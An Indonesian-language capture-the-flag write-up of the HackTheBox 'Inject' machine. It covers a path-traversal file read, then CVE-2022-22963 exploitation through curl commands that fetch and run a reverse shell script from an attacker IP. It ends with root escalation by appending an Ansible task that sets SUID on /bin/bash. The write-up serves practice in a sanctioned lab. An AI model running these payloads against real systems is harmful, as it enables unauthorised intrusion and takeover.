skip to content
Yupy Syntax

HackTheBox - Inject

/ 3 min read

Last Updated:

HackTheBox Inject Write Up

Information Gathering

Nmap Scan

melakukan pemindaian jaringan menggunakan perangkat lunak Nmap pada alamat IP 10.10.11.204. alt text

Port Open

Hasil pemindaian Nmap menunjukkan bahwa terdapat dua port yang terbuka pada host target, yaitu port 22/tcp dan port 8080/tcp. Informasi ini penting dalam mengetahui layanan dan aplikasi apa saja yang berjalan di dalam sistem target.

Port 22/tcp yang terbuka menunjukkan bahwa host target memiliki layanan SSH (Secure Shell) yang berjalan menggunakan aplikasi OpenSSH 8.2p1 Ubuntu 4ubuntu0.5. SSH adalah protokol jaringan yang digunakan untuk mengamankan koneksi jaringan yang tidak aman. Dengan mengetahui informasi ini, pengguna dapat mencoba untuk melakukan autentikasi pada layanan SSH dan mengakses sistem target.

Port 8080/tcp yang terbuka menunjukkan bahwa host target juga menjalankan layanan Nagios NSCA. Nagios NSCA (Nagios Service Check Acceptor) adalah layanan yang digunakan untuk menerima laporan hasil pemantauan Nagios dari sistem yang terpisah. Dalam konteks ini, informasi ini dapat membantu pengguna untuk mengetahui informasi penting tentang performa sistem dan keamanan jaringan

Terminal window
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open nagios-nsca Nagios NSCA

Website

Pada port 8080 terdapat tampilan seperti digambar bawah ini, dan disini terdapat menu upload alt text

Exploitation

Disini kita test upload file .jpg alt text

kalau kita membuka file gambarnya, kemungkinan pada parameter img= ada kerentanan Local File Inclusion alt text

Selanjutnya kita mencoba, menggunakan payload ../../../../../../../etc/passwd alt text

Apabila intercept di burp suite mendapatkan response dari hasil request yang memperlihatkan isi /etc/passwd dan kita mencoba melihat isi directory lainya alt text alt text

Apabila kita melihat file spring-webapp.jar disini terdaoat version yang digunakan sistem tersebut alt text alt text

Setelah mencari - mencari kita mendapatkan kerentanan CVE-2022-22963 Di Spring Cloud Function versi 3.1.6, 3.2.2 dan versi lama yang tidak didukung, saat menggunakan fungsionalitas perutean, pengguna dapat menyediakan SpEL yang dibuat khusus sebagai ekspresi perutean yang dapat mengakibatkan remote code execution dan akses ke sumber daya lokal . alt text

Post Exploitation

RCE and Shell

Mempersiapkan skrip shell yang hanya mengatur koneksi kembali ke mesin saya, dengan membuat shell bash dengan payload reverse seperti digambar alt text alt text

Selanjutnya kita menggunakan payload ini untuk upload file reverse shellnya kedalam server

Terminal window
curl -i -s -k -X 'POST' --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.14.22/shell.sh -O /tmp/yupyshell.sh")' 'http://10.10.11.204:8080/functionRouter'
alt text

Setelah itu kita dapat menjalankan reverse shell dengan payload ini

Terminal window
curl -i -s -k -X 'POST' --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/yupyshell.sh")' 'http://10.10.11.204:8080/functionRouter'
alt text alt text

setelah berhasil backconnect kita akan mencari file atau directory yang bisaa memungkinkan kita untuk menaikan user biasa ke user teratas alt text

Disini kita berhasil mendapatkan user phil pada direktori .m2. alt text

kita mencoba login dengan user phil yang didapat tadi alt text alt text

Privileges Escalation

kita mencoba privilege escalation, kita menemukan file /opt/automation/tasks ini memungkinkan privileges escalation alt text

terdapat file .yml, dan setelah kita membaca file tersebut kita mencoba menyisipkan file alt text

dengan payload ini kita mencoba menyisipkan payload kedalam file .yml

.yml
echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml

setelah berhasil menyisipkan payload pada file .yml selanjutkan kita menjalankan bash -p dan disini kita berhasil mendapatkan user paling atas yaitu root access alt text alt text

Submit Flag in HackTheBox

alt text